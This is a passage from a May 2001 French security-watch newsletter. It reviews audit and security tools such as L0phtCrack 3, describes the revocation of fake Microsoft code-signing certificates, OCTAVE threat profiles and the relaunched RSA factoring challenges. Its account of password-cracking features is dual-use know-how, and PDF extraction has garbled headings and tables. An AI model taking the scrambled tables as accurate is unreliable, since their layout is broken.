Veille Technologique Sécurité

Transcription

APOGEE Communications
R
dee
orrtt d
po
pp
Raap
Veille Technologique Sécurité
N
4
34
N°°3
Mai 2001
Les informations fournies dans ce document ont été collectées et compilées à partir de
sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites
Web, ...
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains
thèmes sont validées à la date de la rédaction du document.
Les symboles d’avertissement suivants seront éventuellement utilisés:
!
"
Site dont la consultation est susceptible de générer directement ou indirectement,
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur
le système d’information associé.
Site susceptible d’héberger des informations ou des programmes dont l’utilisation
est répréhensible au titre de la Loi Française.
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la
qualité des applets et autres ressources présentées au navigateur WEB.
LLaa ddiiffffuussiioonn ddee ccee ddooccuum
meenntt eesstt rreessttrreeiinnttee aauuxx
cclliieennttss ddeess sseerrvviicceess
V
VTTS
S--R
RA
APPPPO
OR
RTT eett V
VTTS
S__EEN
NTTR
REEPPR
RIIS
SEE
Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs.
APOGEE Communications
1, Rue Jean Rostand
91893 ORSAY CEDEX
Pour tous renseignements
Offre de veille:
http://www.apogee-com.fr/veille
Informations:
[email protected]
© APOGEE Communications - Tous droits réservés
Mai 2001
Au sommaire de ce rapport …
PRODUITS ET TECHNOLOGIES
LES PRODUITS
5
5
AUDIT
5
POLIVEC™ SCANNER
L0PHTCRACK 3
5
6
SÉCURISATION
7
ANTISNOOP
ERASER
LES TECHNOLOGIES
7
8
9
PKI
9
DE LA BONNE GESTION DES LISTES DE RÉVOCATION
INFORMATIONS ET LÉGISLATION
LES INFORMATIONS
AUDIT
11
11
11
PROFILS DE MENACE 'OCTAVE'™
CRYPTOGRAPHIE
REPRISE DES DÉFIS RSA
LA
9
LÉGISLATION
SURVEILLANCE
ECHELON
11
12
12
13
13
13
LOGICIELS LIBRES
LES SERVICES DE BASE
LES OUTILS
14
14
14
NORMES ET STANDARDS
LES PUBLICATIONS DE L'IETF
16
16
LES
LES
RFC
DRAFTS
NOS COMMENTAIRES
LES RFC
RFC 3089
LES DRAFTS
DRAFT-FLOYD-TCP-RESET-00
ALERTES ET ATTAQUES
ALERTES
GUIDE DE LECTURE
FORMAT DE LA PRÉSENTATION
SYNTHÈSE MENSUELLE
AVIS OFFICIELS
BUGZILLA
CERT
CIAC
CISCO
FREEBSD
HP
INNFEED
IPSWITCH
KERBEROS
LINUX
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
LINUX SUSE
MICROSOFT
NETSCAPE
NIPC
ORACLE
ROBTEX
SGI
SUN
Veille Technologique Sécurité N°34
16
16
21
21
21
22
22
23
23
23
24
24
25
25
25
25
25
26
26
26
26
27
27
27
27
27
27
28
29
29
29
29
29
29
Page 2/45
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2001
SYMANTEC
EEYE
30
30
ALERTES NON CONFIRMÉES
3COM
ALADDIN
CISCO
CMAIL
MCAFEE
MICROSOFT
NOVELL
VMWARE
30
30
30
30
30
31
31
31
31
AUTRES INFORMATIONS
31
REPRISES D'AVIS
31
ET
CORRECTIFS
ALLAIRE
AUSCERT
CERT
CIAC
COMPAQ
FREEBSD
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
MICROSOFT
OPENBSD
OPENSSL
SAMBA
31
32
32
32
34
34
34
34
35
35
35
35
36
CODES D'EXPLOITATION
36
BULLETINS ET NOTES
36
ALCATEL
HYLAFAX
MICROSOFT
ATTAQUES
AUSCERT
AXENT/SYMANTEC
CERT
CISCO
COMPAQ
ECOMMERCE
HP
ISS
ISS/NETWORKICE
NIPC
SANS
SYMANTEC/AXENT
VIRUS
ATTAQUES
OUTILS
HELLKIT !
MAGIC STRING PIMP !
TECHNIQUES
MANIPULATION D’URL
36
36
36
36
37
37
37
38
38
38
38
38
38
38
39
39
39
39
39
39
41
43
43
Page 3/45
Mai 2001
Le mot de la rédaction …
Une fois n’est pas coutume, nous ne commenterons pas le défi ‘HoneyNet’ du
mois de Mai, défi fort intéressant mais bien trop difficile à traiter dans un
rapport de veille. Il s’agissait en effet de retrouver les traces d’une attaque
utilisant un ‘rootkit’ ayant été ensuite éliminé du système. Tâche difficile mais
oh combien instructive, d’autant que, pour seul indice est fournie l’image de la
partition racine du système LINUX compromis soit 13Mo de données…
Mois de Mai, mois du renouveau marqué par les nombreuses mises à jour de
produits libres, dont ‘apache’ et ‘bind’, qui conduiront certainement l’exploitant à
engager une campagne d’inventaire et d’upgrade.
L'équipe de Veille Technologique
Page 4/45
Mai 2001
PR
RO
EC
OD
CH
DU
HN
UIIT
NO
OL
TS
LO
SE
OG
GIIE
ET
T TE
ES
S
LES
PRODUITS
AUDIT
POLIVEC™ SCANNER
# Description
PoliVec™ Scanner est le premier logiciel disponible d’une famille de produits de sécurité édités
par la société américaine ‘e-business technology‘. Trois produits devraient composer à terme
cet environnement: PoliVec Scanner, PoliVec Builder, PoliVec Enforcer. Notons qu’aucune
information n’est disponible concernant l’infrastructure générale et les fonctionnalités associées
aux deux derniers produits en dehors de la présentation laconique de la gamme PoliVec™:
PoliVec™ is a suite of innovative policy-driven security products designed to specifically address the issue of
enterprise security management and control. Using patent pending binary vector technology, PoliVec supports the
definition, implementation and proactive monitoring of a comprehensive security policy across the entire
enterprise architecture.
Une version de démonstration du produit PoliVec™ Scanner, valable pour une durée de 30 jours, est proposée sur le
site de l’éditeur sous la forme d’un paquetage de 14Mo. Cette offre permet d’obtenir une bonne idée de la capacité de
ce produit positionné en tant qu’outil d’aide à l’administration de la sécurité en environnement Windows.
Dans ce domaine, les fonctions d’acquisition des paramètres de sécurité et de gestion des configurations associées
doivent être considérées comme fondamentales. Sans elles, aucun suivi du niveau de sécurité du système
d’information ne peut être effectué. PoliVec™ Scanner intervient à ce niveau en offrant, sur la base d’un modèle
distribué ‘console/agents‘, l’ensemble des fonctions d’acquisition, d’analyse et de reporting permettant d’obtenir en
temps quasi-réel un état des lieux d’un parc de postes NT et Windows 2000.
Après avoir activé le produit, l’utilisateur se voit proposer deux choix :
1. Recharger les données correspondant à un audit
effectué précédemment et enregistrées sous le
nom du système audité.
2. Engager un nouvel audit, étant entendu que
l’utilisateur dispose des éléments d’authentification
nécessaires sur les systèmes cibles : identifiant et
mot de passe d’un compte privilégié sur un
système autonome ou privilèges sur le domaine
d’appartenance du poste cible.
Dans le second cas, l’utilisateur obtiendra la liste des
systèmes NT et W2K présents sur le réseau ou déclarés
dans un domaine puis sélectionnera la cible de l’audit
dans liste proposée.
L’audit pourra être initialisé après établissement d’une
session authentifiée ou anonyme (Null Session).
Attention, ce dernier mode ne permet pas d’acquérir
toutes les informations susceptibles d’être obtenue en
mode authentifié.
Les résultats pourront être visualisés, et imprimés sous
la forme d’un rapport mis en page (notons que la
version de démonstration (PoliVec 1.0) semble être
entachée d’un défaut provoquant une erreur lors de la
génération du rapport).
PoliVec™ Scanner assure la collecte et l’analyse des
informations suivantes :
1. Partages réseaux
2. Configuration des comptes utilisateurs
3. Configuration des groupes
4. Configuration système
5. Contenu de la registry
6. Etat des services
Bien qu’il soit difficile de juger de l’intérêt d’un produit d’administration dans un contexte aussi restrictif que celui du
test d’une version de démonstration, PoliVec Scanner apparaît être un produit dont l’ergonomie de l’interface laisse
Page 5/45
Mai 2001
envisager qu’il puisse être d’un grand secours dans un environnement Mixte Windows ™ NT/ Windows 2000. Notons
cependant l’existence d’autres produits offrant des fonctions similaires dont notamment ceux proposés par la société
SystemTools (ex Adkins): DumpSec (utilitaire gratuit écrit par SomarSoft) et Hyena V3 (la version 2.3 est
présentée dans notre rapport de veille N°21 d’avril 2000).
Attention, l’installation du produit en mode démonstration copie, et active sans informer l’utilisateur, un service de
gestion de clefs de licence, ‘CryptKey’, qui reste actif après désinstallation du produit …
# Complément d'information
https://www.polivec.com/scanner/
L0PHTCRACK 3
# Description
Une nouvelle version du célèbre outil l0phtCrack est désormais disponible. Bien que distribué à l’origine en tant
qu’utilitaire libre de tous droits, la stratégie de distribution et de licence mise en place depuis la version LC2 (Rapport
de veille N°2 Février 1998) fait de L0phtCrack un véritable produit de sécurité. Désormais destiné à analyser la
qualité de la politique de gestion des mots de passe, l0phtCrack reste cependant un outil susceptible d’être utilisé à
des fins malveillantes…
La version 3, dite LC3, est livré par la société d’édition de logiciels ‘Security Software Technology’ (ou SST) qui
détient depuis Janvier les droits de distribution des produits développés par le groupe l0pht (l0phtCrack et
AntiSniff) avant sa fusion avec la société @stake. Notons à ce sujet que SST détient aussi les droits de distribution
du produit d’audit CIS (Cerberus Internet Scanner) – ex. NtInfoScan - précédemment édité par la société Anglaise
Cerberus Infosec. Cette société a elle-même été rachetée en Juillet 2000 par @stake dont les ambitions dans le
domaine de l’audit de sécurité semblent se confirmer.
Livrée sous la forme d’un paquetage d’installation de 4.6Mo, la version LC3 est désormais compatible Windows 2000.
Elle intègre par ailleurs de nombreuses fonctionnalités d’acquisition précédemment accessibles sous la forme
d’utilitaires indépendants. Un mode d’évaluation sur une période limitée à 15 jours autorise l’accès à toutes les
fonctions à l’exception de l’attaque en force des mots de passe. La version complète est accessible au prix de $249
l’unité ou de $1999 pour 10 licences. Les nouvelles fonctionnalités de la version LC3 sont les suivantes :
•
Support Windows 2000™ : LC3 peut extraire les
informations relatives aux comptes (condensés chiffrés
des mots de passe) par extraction directe depuis
l’annuaire même si celui-ci est protégé par le
mécanisme SYSKEY. La fonction d’acquisition par
écoute des conversations réseaux, présente dans la
version LC2, a été mise à jour pour gérer les nouveaux
formats utilisés par W2K.
•
Aide à la configuration : une aide interactive permet
de rapidement configurer le produit : source de donnée,
méthode d’attaque et présentation des résultats.
L’utilisateur notera que les écrans d’accueil du produit
font référence à la méthode d’audit (‘Auditing method’)
lorsqu’il s’agit de sélectionner la stratégie d’attaque du
mot de passe …
•
Analyse distribuée : l’attaque en force des mots de
passe est d’autant plus efficace que la puissance de
calcul disponible est grande. LC3 autorise la distribution
du calcul sur plusieurs machines permettant ainsi de
réduire le temps de recouvrement des mots de passe.
•
Dictionnaire étendu : un dictionnaire de 250 000
mots – anglais – est fourni avec cette version. Notons à
ce propos que la gestion des caractères étendus (dont
les accentués) n’est toujours pas intégrée au produit.
Ainsi, et à titre d’exemple, le mot de passe d’un compte
dénommé ‘élevé’ ne sera trouvé ni par attaque en
force, ni par attaque sur un dictionnaire contenant ce
mot, ni même par analyse de trivialité lorsque le mot
de passe est identique au nom du compte !
•
Formats d’import : plusieurs nouveaux formats
d’import sont proposés permettant d’assurer une
analyse en temps différé sur un système tiers.
•
Présentation améliorée : il est désormais possible
d’enlever un mot de passe de la liste des mots de passe
à analyser via l’interface graphique. Par ailleurs,
l’utilisateur peut choisir de ne pas afficher le mot de
passe en clair si celui-ci est découvert.
La version LC3 n’aura qu’un intérêt limité dans un environnement utilisant (ou imposant l’utilisation) des jeux de
caractères étendus. Par ailleurs, force est de constater que les fonctionnalités qui permettraient de considérer LC3
Page 6/45
Mai 2001
comme un véritable outil d’administration n’ont toujours pas été intégrées:
- notification de l’utilisateur dont le mot de passe a été découvert,
- possibilité de verrouiller conditionnellement les comptes pour lesquels le mot de passe est trivial, …
Cela est d’autant plus surprenant lorsque l’on sait que ces fonctionnalités ont été intégrées dés la première version
d’un utilitaire similaire mais adapté au monde UNIX : Crack V5 d’Alec Muffet.
Attention, la procédure d’installation du paquetage testé présente un défaut: le module WinpCap permettant
l’acquisition des informations sur le réseau n’est pas installé conduisant à une erreur d’exécution de LC3 lors de son
chargement. Il est nécessaire d’installer manuellement ce module au moyen de l’utilitaire Setup.exe présent dans le
sous-répertoire WinPCap localisé sous le répertoire temporaire d’extraction de LC3.
# Complément d’information
http://www.securitysoftwaretech.com/lc3/
SECURISATION
ANTISNOOP
# Description
L’utilitaire ‘AntiSnoop’, accessible en ShareWare moyennant $20, est présenté comme une solution de protection
contre le vol des mots de passe et autres codes secrets devant être saisis au clavier d’un poste Windows.
De nombreux utilitaires sont en effet disponibles qui permettent l’enregistrement et la restitution ultérieure de tout ou
partie des séquences de touches saisies par l’utilisateur, dont bien évidemment les mots de passe des applications
protégées. Notons à ce propos que l’installation de ces enregistreurs est généralement effectuée par le biais d’un code
mobile spécifique ou d’un cheval de Troie. Le concept proposé est astucieux puisqu’il vise à limiter toute saisie au
clavier en utilisant de manière intensive la souris ainsi que le mécanisme du copier/coller, et par conséquent, le
presse-papier.
Ainsi, la saisie d’une donnée sensible ne pourra plus être
journalisée par les enregistreurs s’installant autour du
gestionnaire de clavier et ne journalisant pas les échanges
effectués par le biais du presse-papier.
Le fonctionnement d’AntiSnoop est simple :
L’utilisateur sélectionne tout d’abord le mot de passe maître
nécessaire pour déverrouiller l’accès aux identifiants gérés
par AntiSnoop.
Ce mot de passe est saisi par l’intermédiaire de la souris en
sélectionnant les caractères le composant sur une rangée de
boutons.
L’organisation de ces boutons et la liste des caractères
proposée est modifiée à chaque initialisation du logiciel pour
défier toute tentative d’analyse par un mécanisme de
journalisation des évènements graphiques.
Les identifiants sont ensuite inscrits en saisissant un nom de
référence (alias) puis le code à stocker.
Ces informations seront enregistrées après avoir été
chiffrées au moyen de l’algorithme Blowfish développé par
B.Schneier.
Ces opérations d’initialisation effectuées, l’utilisateur pourra à
tout instant activer AntiSnoop installé dans la barre d’outil.
Après avoir saisi le mot de passe maître à l’aide de la souris,
l’utilisateur se verra proposer la liste des noms de référence et
des codes associés. Notons que cette liste peut être masquée
par une simple action sur le bouton ‘Hide‘
L’utilisateur sélectionnera
ensuite le
code souhaité et copiera celui-ci dans le
presse papier au moyen d’un clic sur le
bouton ‘Copy’.
L’opération inverse sera effectuée en
copiant le contenu du presse papier dans
la zone de saisie du code présentée par
l’application cible.
Fourni avec une excellente aide en ligne, cet utilitaire se substituera sans difficulté à d’autres produits similaires mais
n’assurant qu’un archivage des codes dans une base chiffrée.
http://32-bitfreeware.virtualave.net
Page 7/45
Mai 2001
ERASER
# Description
Eraser est l’un de ces outils dont on pourrait, a priori, considérer qu’il n’intéressera que le plus paranoïaque des
utilisateurs d’un système informatique. Il s’agit en effet de l’une de ces nombreuses versions électroniques du broyeur
mécanique de documents destiné à faire disparaître toute trace lisible d’un document sensible.
L’obligation d’effacer une donnée après utilisation, que celle-ci soit localisée dans un fichier ou dans une zone
mémoire, apparaît dans l’un des ouvrages de la célèbre collection éditée par le DoD et connu sous le terme
‘RainBow’ : le livre Orange. Un système devant être certifié au niveau C2 doit en effet garantir l’effacement des
données avant réutilisation de la ressource. En réalité, cette exigence fait partie intégrante d’une stratégie de
nettoyage (sanitizing) visant à éviter la compromission des données ayant fait l’objet d’un stockage en prenant en
compte le cycle de vie du support de stockage: de l’initialisation à la destruction. Le domaine de la récupération des
données numériques sur supports magnétiques étant considéré comme sensible, les techniques et mécanismes utilisés
sont longtemps restés confidentiels. Les rares informations circulant au sujet de la possible récupération de données
effacées (au sens magnétique) étaient considérées comme rumeurs infondées.
En 1996 lors d’une conférence USENIX Peter Gutmann, un spécialiste de la sécurité, fait sensation en dévoilant au
grand public différentes techniques permettant de révéler ‘couche par couche’ les données enregistrées sur un support
magnétique. Ces techniques avaient pourtant fait l’objet dès 1985 de publications restées, semble-t-il, confidentielles.
Depuis, les outils de nettoyage et d’effacement de sécurité fleurissent: un article comparatif mis à jour l’année
dernière (Mai 2000) ne recense pas moins de 27 outils similaires en environnement Windows !
Ecrit par un étudiant Finlandais, Sami Tolvanen, Eraser se
distingue non seulement par les fonctionnalités proposées mais
aussi par le choix d’un mode de distribution sous licence GPL
offrant un accès gratuit au programme mais aussi aux sources de
celui-ci. Un quelconque programme tiers pourra bénéficier des
fonctions techniques proposées, celles-ci étant regroupées dans
une librairie dynamique dont les interfaces sont parfaitement
documentées.
La version Eraser 5.01 fonctionne en environnement Windows ™
95, 98, ME, NT 4.0 et 2000. L’effacement d’un fichier peut être
initialisé directement depuis l’explorateur de fichier après
sélection de la cible ou depuis une interface de commande
spécifique.
Dans tous les cas, l’utilisateur est libre de sélectionner, dans une
liste de méthodes prédéfinies, la méthode d’effacement devant
être appliquée.
Trois méthodes sont proposées par défaut :
1. Méthode ‘Gutman’ en référence à la technique suggérée par
Peter Gutman dans l’article cité précédemment,
2. Méthode ‘Dod 5220.22-M’ conforme aux dispositions décrites
dans le chapitre 8-306 du manuel NISPOM (‘National
Industrial Security Program Operation Manual’),
3. Méthode ‘Aléatoire’ consistant à remplir la zone occupée par
le fichier avec une série de données aléatoires.
L’utilisateur peut créer sa propre méthode d’effacement en
définissant celle-ci sous la forme d’une succession, ordonnée ou
aléatoire, d’effacements élémentaires : écriture aléatoire ou
écriture d’un motif configurable de 3 octets au plus.
L’interface de commande spécifique autorise la définition de
travaux d’effacement ‘à la demande’ ou ‘planifiés’ permettant
ainsi de réduire l’impact du traitement sur les performances
générales du poste.
Cet utilitaire, performant et ergonomique, répondra parfaitement
aux besoins des utilisateurs désireux d’éliminer toute trace
résiduelle d’un document électronique sur le poste de travail.
Comme souvent dans le domaine de l’investigation sur support
électronique, l’efficacité de la technique mise en œuvre ne pourra
être garantie à 100%, les technologies d’analyse n’étant
certainement pas toutes divulguées.
La disponibilité des sources est un atout face aux produits commerciaux concurrents permettant à tout un chacun de
se faire une opinion sur la qualité de l’implémentation et, éventuellement, de vérifier l’absence de fonctions non
documentées.
http://www.tolvanen.com/eraser/
http://www.dss.mil/isec/nispom.htm
http://www.usenix.org/publications/library/proceedings/sec96/full_papers/gutmann/
Page 8/45
Mai 2001
LES
TECHNOLOGIES
PKI
DE LA BONNE GESTION DES LISTES DE REVOCATION
# Description
Le 22 Mars 2001, l’autorité de certification commerciale Verisign annonçait avoir délivré fin Janvier 2001 deux
certificats de type ‘Classe 3 Commercial Software Publisher’ à une personne se faisant passer pour un employé
de Microsoft. Cette catégorie de certificat est principalement destinée à signer les codes mobiles et autres objets
produits par une entité commerciale assurant l’édition de logiciels, la classe ‘Individual Software Publishers’ étant
elle réservée aux concepteurs individuels de logiciel.
Conséquence de cette ‘erreur’, le possesseur des clefs privées associées aux deux certificats peut signer, et diffuser,
n’importe quelle composante logicielle en se faisant passer pour ‘Microsoft Corporation’ durant toute la période de
validité de ces deux certificats sauf anticiper en révoquant ceux-ci.
Etonnamment, cette dernière solution est à l’origine d’une véritable polémique concernant non pas l’origine de l’erreur
mais la capacité des produits à gérer cette opération pourtant toute simple consistant en l’inscription des certificats
incriminés dans une liste appelée ‘Liste de révocation’ (ou CRL) accessible à tous. A tous oui, mais sous réserve de
connaître le chemin d’accès à cette liste !
Une excellente analyse de la prise de position des deux partis - Verisign et Microsoft - a été publiée sur le site
amug.org et reprise par B.Schneier dans sa lettre mensuelle. Sans rentrer dans le détail, le lecteur se reportera à
l’analyse précitée, nous proposons une brève synthèse des différents éléments du dossier.
Le problème soulevé est celui de l’ambiguïté de la position de Microsoft qui, d’une part annonce la disponibilité d’un
correctif – MS01-017 - destiné à rejeter les certificats usurpés, et d’autre part, affirme que Windows supporte le
mécanisme des listes de révocations (CRL) depuis 1998 pour NT et 1999 pour la famille Windows9x. Pourquoi diffuser
un correctif si le mécanisme de révocation est fonctionnel !
Le document de référence applicable en la matière est le RFC2459 ‘Internet X.509 Public Key Infrastructure
Certificate and CRL Profile’ qui décrit en détail la structure d’un certificat X509.v3 utilisable dans le contexte de
l’Internet. Ce RFC détaille par ailleurs le mécanisme de révocation basé sur le contrôle de la non inscription du
certificat dans une liste de révocation. A ce jour, quatre mécanismes d’acquisition de ces listes de révocation sont
couramment employés :
1. Méthode manuelle : l’utilisateur télécharge une liste de révocation à partir d’une URL réputée fiable et
sauvegarde celle-ci en un lieu où elle pourra être exploitée. Bien entendu, cette méthode est une source
potentielle d’erreur car imposant une synchronisation manuelle.
2. Méthode de l’URL connue : chaque Autorité de Certification publie sur son site la liste de révocation
correspondant à son autorité. Lorsqu’une vérification ou mise à jour s’avère nécessaire, le téléchargement de
dernière version de la liste peut rapidement être effectué par l’utilisateur.
3. Méthode de l’URL certifiée : la localisation de la liste de révocation est inscrite dans l’un des attributs étendus
du certificat racine de l’autorité de certification. Cette méthode offre un double avantage en autorisant
l’automatisation du téléchargement de la liste de révocation depuis une localisation certifiée.
4. Méthode RFC2459 : cette méthode est similaire à la précédente mais la localisation de la liste de révocation est
inscrite dans chacun des certificats émois simplifiant encore le processus d’automatisation de la mise à jour de
cette liste.
La position de Microsoft est plus facilement admissible en ayant connaissance des éléments suivants :
#
Le mécanisme central de contrôle des certificats – CryptoAPI – est
conforme aux recommandations du RFC2459. Ainsi, lorsqu’un certificat
contenant un CDP (CRL Distribution Point) est présenté, la liste de
révocation est automatiquement mise à jour, sous réserve toutefois que
les options correspondantes (‘Check for server certificate revocation’ et
‘Check for publisher’s certificate revocation’) aient été activées, ce qui
n’est pas le cas par défaut !
#
Ce mécanisme n’offre aucune interface officielle permettant de configurer l’utilisation d’une liste de révocation
locale ou d’une URL connue.
#
Les certificats émis par Verisign ne contiennent pas l’attribut étendu CDP.
Dés lors, le moyen permettant de révoquer à coup sûr les deux certificats sans remettre en cause l’implémentation
courante de la CryptoAPI est l’application d’un correctif purement ‘palliatif’ … Notons cependant que bien que la
parade utilisée ne soit pas documentée, le correctif contient deux fichiers - une librairie dénommée ‘mscrlrev.dll’
ainsi qu’un fichier dénommé ‘verisignpub1.crl’ - qui sont simplement copiés sous le répertoire
‘%systemroot%\system32’. La visualisation du contenu du fichier ‘verisignpub1.crl’ confirme qu’il s’agit d’une CRL en
bonne et due forme.
Page 9/45
Mai 2001
Disposerait-on enfin, après application de ce correctif, d’un moyen permettant de déclarer une quelconque liste de
révocation par simple transfert de celle-ci dans le répertoire ‘%systemroot%\system32’ ?
http://amug.org/~glguerin/opinion/revocation.html
http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
http://www.verisign.com/developer/notice/authenticode/index.html
Page 10/45
Mai 2001
IN
NF
EG
FO
GIIS
OR
RM
SL
MA
LA
AT
AT
TIIO
TIIO
ON
ON
NS
N
SE
ET
T LE
LES
INFORMATIONS
AUDIT
PROFILS DE MENACE 'OCTAVE'™
# Description
La méthodologie d'évaluation des risques Octave™ (Operationally Critical Threat, Asset, and Vulnerability
Evaluation) a été développée par l'université de Carnegie Mellon (CMU). Passée inaperçue à l'origine bien que
détaillée en 1999 dans le rapport technique SEI-99-TR-017, la méthodologie Octave™ est désormais soutenue par le
CERT-CC qui lui consacre un effort de promotion et de développement conséquent.
Rappelons que cette méthodologie s'appuie sur une démarche organisée en trois phases, phases elles-mêmes
décomposées en 8 tâches:
1. Inventaire des actifs et identification des menaces
(Build Asset-Based Threat Profiles*)
La perception des besoins en terme de sécurité est collectée auprès des personnels appartenant à trois niveaux
d'organisation de l'entreprise en ciblant les thèmes de l'inventaire des actifs clefs, de la valeur de ceux-ci, des
menaces potentielles, des niveaux de risque admissibles et de la stratégie de protection mise en œuvre.
Quatre tâches sont engagées:
P1 - Identification de la perception des besoins par les cadres dirigeants
P2 - Identification de la perception des besoins par les cadres opérationnels
P3 - Identification de la perception des besoins par les autres personnels
P4 - Etablissement de la synthèse des besoins
2. Evaluation de l'infrastructure sur la base des actifs clefs
(Identifiy Infrastructure Vulnerabilities)
Les résultats de la phase précédente permettent d'identifier les composants supportant les actifs considérés
comme les plus importants. Une analyse de vulnérabilité est ensuite engagée sur tout ou partie de l'infrastructure
portant ces composants.
P5 - Cartographie de l'infrastructure du SI en vu d'identifier la localisation des actifs, les chemins d'accès et flux
de données associés
P6 - Evaluation de la vulnérabilité de l'infrastructure
3. Détermination de la stratégie de gestion des risques
(Determine Security Risk Management Strategy)
La stratégie de gestion des risques est déterminée en tenant compte d'une analyse s'appuyant sur différents
scénarios d'intrusion. La stratégie de protection peut alors être établie.
P7 - Analyse de risque multidimensionnelle
P8 - Développement d'un stratégie de protection
Dans sa forme actuelle, Octave doit être considéré comme un cadre de travail proposant une démarche pertinente
mais nécessitant cependant la mise à disposition de documents complémentaires pour pouvoir être appliquée avec
efficacité. Ainsi, la phase initiale visant à établir les besoins de sécurité par le biais d'une évaluation organisationnelle
ne peut être menée sans disposer d'une définition fiable et structurée des éléments méthodologiques manipulés:
actifs (asset), menace (threat), risque (risk), atteinte (outcome) …
Ainsi, un premier document complémentaire de la méthodologie Octave intitulé 'Octave™ Threat Profiles' publié
par le département SEI de l'Université de Carnegie Mellon propose un modèle de description d'une menace.
Quatre catégories de menace sont prises en compte:
a) Les acteurs humains utilisant un accès réseau
b) Les acteurs humains utilisant un accès physique
c) Les problèmes systèmes
d) Les autres problèmes
Un profil décrivant une menace est alors être établi pour chacune de ces quatre catégories à partir d'un modèle
générique élémentaire défini sous la forme d'un arbre constitué d'au plus cinq niveaux:
Page 11/45
Mai 2001
Les attributs 'Accès' et 'Cause'
ACTIF
ACCES
ACTEUR
CAUSE
CONSEQUENCE
sont optionnels et ne sont utilisés
asset
access
actor
motive
outcome
que dans le cadre des catégories
de menaces ayant pour origine
Divulgation
directe un être humain. Ce modèle
Modification
peut, bien entendu, être adapté
Perte / Destruction
pour tenir compte de contextes
Interruption
spécifiques.
Notons que le CERT CC annonce la mise à disposition cet été d'un guide d'implémentation de la méthode Octave.
* L'intitulé de la phase 1 utilisé dans les présentations effectuées par le CERT (Build Asset-Based Threat Profiles) diffère de celui
présent dans le rapport technique du SEI (Build Enterprise-Wide Security Requirements). L'intitulé retenu par le CERT à pour
mérite d'être plus directif.
http://www.sei.cmu.edu/publications/documents/99.reports/99tr017/99tr017abstract.html
http://www.cert.org/archive/pdf/OCTAVEthreatProfiles.pdf
CRYPTOGRAPHIE
REPRISE DES DEFIS RSA
# Description
En 1991, la société RSA Security lançait à la communauté des cryptanalystes une série de 41 défis intitulés ‘RSA
Factoring challenge‘ dont l’objectif consistait en la factorisation – réduction sous la forme des deux facteurs
premiers - de nombres dont la longueur s’échelonnait de 100 à 500 chiffres par pas de 10 chiffres. Quatre de ces défis
ont été remportés dont RSA-129, RSA-130, RSA-140 (terminé le 2/02/1999) et RSA-155 (terminé le 22/08/1999).
Dans le même temps deux autres séries de défis voyaient le jour :
- la série de défis ‘RSA Secret Key Challenge’ visant à recouvrer le texte original à partir du chiffré produit à l’aide
des algorithmes DES (un challenge remporté en Juin 1997) et RC5 ( douze challenges dont seuls trois ont été
remportés la même année).
- une série de trois défis intitulés ‘DES Challenge’ ayant le même objectif mais dédiés à l’algorithme DES. Le dernier
de ces défis, ‘DES III Challenge’ , a été remporté le 19 Janvier 1999.
Depuis 2 ans, un calme plat s’est installé: aucun des défis ‘RSA Factoring Challenge’ restant n’a été tenté. Plusieurs
raisons pouvent expliquer ce désistement dont principalement une taille devenu trop petite pour être représentative
d’une avancée significative et probablement l’absence de dotations encourageantes.
En conséquence, RSA Security a annoncé mi-Mai la reprise de la série de défis ‘RSA Factoring challenge’ sous une
nouvelle forme en offrant une dotation qui va de $10 000 à $200 000. Huit nouveaux défis sont donc désormais
officiellement ouverts. Il est à noter que le nom du défi exprime désormais la taille du nombre devant être factorisé en
bits et non plus en digits (chiffres décimaux):
Défi
Prix
Digits Nombre à factoriser
1881988129206079638386972394616504398071635633794173827007633564229888597152346654
RSA-576
$ 10 000 174
RSA-640
$ 20 000
193
RSA-704
$ 30 000
212
RSA-768
$ 50 000
232
RSA-896
$ 75 000
270
RSA-1024
$100 000
309
RSA-1536
$150 000
463
RSA-2048
$200 000
617
8531906060650474304531738801130339671619969232120573403187955065699622130516875930
7650257059
3107418240490043721350750035888567930037346022842727545720161948823206440518081504
5563468296717232867824379162728380334154710731085019195485290073377248227835257423
86454014691736602477652346609
7403756347956171282804679609742957314259318888923128908493623263897276503402826627
6891996419625117843995894330502127585370118968098286733173273108930900552505116877
063299072396380786710086096962537934650563796359
1230186684530117755130494958384962720772853569595334792197322452151726400507263657
5187452021997864693899564749427740638459251925573263034537315482685079170261221429
13461670429214311602221240479274737794080665351419597459856902143413
4120234369866595438555313653325759481798116998443279828454556264338764455652484261
9809887042316184187926142024718886949256093177637503342113098239748515094490910691
0269861031862704114880866970564902903653658867433731720813104105190864254793282601
391257624033946373269391
1350664108659952233496032162788059699388814756056670275244851438515265106048595338
3394028715057190944179820728216447155137368041970396419174304649658927425623934102
0864383202110372958725762358509643110564073501508187510676594629205563685529475213
500852879416377328533906109750544334999811150056977236890927563
1847699703211741474306835620200164403018549338663410171471785774910651696711161249
8593376843054357445856160615445717940522297177325246609606469460712496237204420222
6975675668737842756238950876467844093328515749657884341508847552829818672645133986
3364931908084671990431874381283363502795470282653297802934916155811881049844908319
5450098483937752272570525785919449938700736957556884369338127796130892303925696952
53261620823676490316036551371447913932347169566988069
2519590847565789349402718324004839857142928212620403202777713783604366202070759555
6264018525880784406918290641249515082189298559149176184502808489120072844992687392
8072877767359714183472702618963750149718246911650776133798590957000973304597488084
2840179742910064245869181719511874612151517265463228221686998754918242243363725908
5141865462043576798423387184774447920739934236584823824281198163815010674810451660
3773060562016196762561338441436038339044149526344321901146575444541784240209246165
1572335077870774981712577246796292638635637328991215483143816789988504044536402352
7381951378636564391212010397122822120720357
Si l’un de ces défis tente le lecteur, rappelons que le défi RSA-155 (512bits), donc ‘proche’ du défi RSA-576, n’avait
demandé que 7,4 mois calendaire de travail en durée mais 35,7 années équivalentes de puissance de calcul distribuée
Page 12/45
Mai 2001
sur 160 SUN 175/400Mhz, 8 SGI 200Mhz, 120 PII 300/400Mhz, 4 Digital 500Mhz.
Quelques chiffres clefs concernant les principaux défis sont rappelés dans le tableau suivant:
Défi
Date
Taille
Durée
Années CPU Coût matériel (MF) Prix ($)
Origine
